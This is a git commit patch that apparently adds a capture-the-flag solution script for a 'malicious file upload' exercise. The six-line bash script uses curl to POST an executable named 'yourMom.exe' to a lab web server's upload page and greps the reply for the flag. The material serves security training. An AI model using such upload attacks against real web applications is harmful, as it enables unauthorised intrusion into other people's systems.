From 642f809226c9e25c22c3c97ee12dadfda945f17a Mon Sep 17 00:00:00 2001 From: Thomas Vanbesien Date: Fri, 27 Mar 2026 15:43:45 +0100 Subject: Add malicious file upload solution --- Upload malicious file/Resources/upload.bash | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100755 Upload malicious file/Resources/upload.bash (limited to 'Upload malicious file/Resources/upload.bash') diff --git a/Upload malicious file/Resources/upload.bash b/Upload malicious file/Resources/upload.bash new file mode 100755 index 0000000..46b90fc --- /dev/null +++ b/Upload malicious file/Resources/upload.bash @@ -0,0 +1,6 @@ +#!/usr/bin/bash + +curl --silent -X POST \ + 'http://10.0.2.15/?page=upload' \ + --header "Content-Type: multipart/form-data; boundary=----BOUNDARY" \ + --data-binary @yourMom.exe | grep flag -- cgit v1.2.3